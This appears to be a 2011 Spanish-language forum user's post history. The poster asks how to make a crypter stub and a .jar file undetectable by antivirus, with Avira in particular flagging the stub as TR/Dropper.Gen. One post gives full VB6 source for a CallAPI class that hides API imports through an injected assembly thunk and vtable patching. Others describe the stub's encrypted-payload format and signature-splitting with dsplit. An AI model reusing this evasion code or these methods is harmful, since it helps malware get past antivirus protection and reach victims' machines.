|
Mostrar Mensajes
|
Páginas: 1 [2] 3
|
12
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Avira 1 - Yo 0
|
en: 12 Septiembre 2011, 17:03 pm
|
Utilizo : Private cCall As New Clas222 Public Function CallAPI(ByVal strLib As String, ByVal strMod As String, ParamArray Params()) As Long Dim Params2() Params2 = Params CallAPI = cCall.Invoke(strLib, strMod, Params2()) End Function
Private Type tAPICall ptsLIB As Long ptsProc As Long lReserved As Long lPointer As Long lpBuffer(3) As Long End Type Private c_lVTE As Long Private c_lOldVTE As Long Private c_bvASM(&HFF) As Byte Private Declare Function DllFunction Lib "MSVBVM60" Alias "DllFunctionCall" (ByRef typeAPI As tAPICall) As Long Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long) Public Function zDoNotCall() As Long End Function Public Function Invoke(ByVal sLib As String, ByVal sFunc As String, Params()) As Long Dim lPtr As Long Dim i As Long Dim sData As String Dim sParams As String Dim lMod As Long lMod = GetAPIPtr(sLib, sFunc) If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & "68" & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3" sData = Replace(sData, "<PATCH1>", sParams) sData = Replace(sData, "<PATCH2>", GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetAPIPtr(ByVal sLib As String, ByVal sProc As String) As Long On Error Resume Next Dim tAPI As tAPICall Dim bvLib() As Byte Dim bvMod() As Byte Call Unicode2ANSI(sLib, bvLib) Call Unicode2ANSI(sProc, bvMod) With tAPI .ptsLIB = VarPtr(bvLib(0)) .ptsProc = VarPtr(bvMod(0)) .lReserved = &H40000 .lPointer = VarPtr(.lpBuffer(0)) End With GetAPIPtr = DllFunction(tAPI) End Function Private Sub Unicode2ANSI(ByVal sUNICODE As String, ByRef bvANSI() As Byte) Dim i As Long ReDim bvANSI(Len(sUNICODE)) For i = 1 To Len(sUNICODE) bvANSI(i - 1) = Asc(Mid$(sUNICODE, i, 1)) Next i End Sub Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long CopyMemory bvTemp(0), lData, &H4 For i = 0 To 3 GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / (1 + 1))) = CByte("&h" & Mid(sThunk, i + 5 - 4, 1 + 1)) Next i End Sub Private Function PatchCall() As Long CopyMemory c_lVTE, ByVal ObjPtr(Me), &H4 c_lVTE = c_lVTE + &H1C CopyMemory c_lOldVTE, ByVal c_lVTE, &H4 CopyMemory ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4 PatchCall = zDoNotCall CopyMemory ByVal c_lVTE, c_lOldVTE, &H4 End Function
Lo q tmb probe es hacer un TLB para sacar esas apis del codigo pero no lo e logrado
|
|
|
13
|
Programación / Java / Re: Indetectar .jar
|
en: 8 Septiembre 2011, 00:00 am
|
Para decompilar el .jar uso "java decompiler" y para compilar uso "Eclipse" ,,si me podes tirar algun dato te lo agredeceria mucho ,,saludos
|
|
|
14
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Avira 1 - Yo 0
|
en: 7 Septiembre 2011, 23:45 pm
|
Lo siento por no responder antes estuve con algunos problemas en el trabajo..
Desde ya gracias por contestar!!
Karcrack ,,siempre se aprende algo nuevo jaja no sabia q se llamaba asi lo q hacia,,q otro metodo existe para insertar el codigo en el stub?.
Y si estoy usando un callapi desde el comienzo gracias a eso me quedo el avira detectando mi stub ,The Swash me gustaria q me orientes un poco si es posible obviamente como se mueve la referencia de la cadena a cualquier hueco de la cabecera PE ,,SALUDOS.
|
|
|
15
|
Programación / Java / Indetectar .jar
|
en: 3 Septiembre 2011, 04:57 am
|
Estoy buscando la forma de indetectar un .jar ,,segun lo q e leido la unica forma de hacerlo indetectable es cambiando el codigo ,nombre de variables ,nombre de class etc ,,ahora busque y busque pero no logro decomplicar el class en .java para luego editarlo y despues compilarlo de vuelta en .class ,,en realidad si lo logro pero sin hacer ninguna modificacion intento compilarlo en .class pero me tira muchos errores
|
|
|
16
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Avira 1 - Yo 0
|
en: 2 Septiembre 2011, 02:48 am
|
lo q hago es lo mas basico pongo un separador la informacion cifrada y luego otro separadaro con la key y por ultimo un serparador mas ,,ojo q ya me detecta el stub sin la informacion agregada (seguro q el ecryptado tmb detecta pero ya el stub es detectado)
|
|
|
18
|
Seguridad Informática / Análisis y Diseño de Malware / Avira 1 - Yo 0
|
en: 31 Agosto 2011, 21:02 pm
|
El avira me sigue ganando aun no lo he logrado sacar he prodabado de todo y nda ,,el stub esta fud a todos menos al gran amigo avira ,,algo q me desconcierta mucho es q al hacer dsplit al stub y analizar todo es igual detectado lo mejor es q puse como offset incial el 1 y ni asi me deja uno sin ser detectado lo q me marca es la firma TR/Dropper.Gen ,, asi q nse como saltarlo ya q no hay offset q cambiar ,le cambie el icono y la descripcion del stub pero tmp hubo resultado ,,alguna ayuda plsss!
|
|
|
|
|
|
|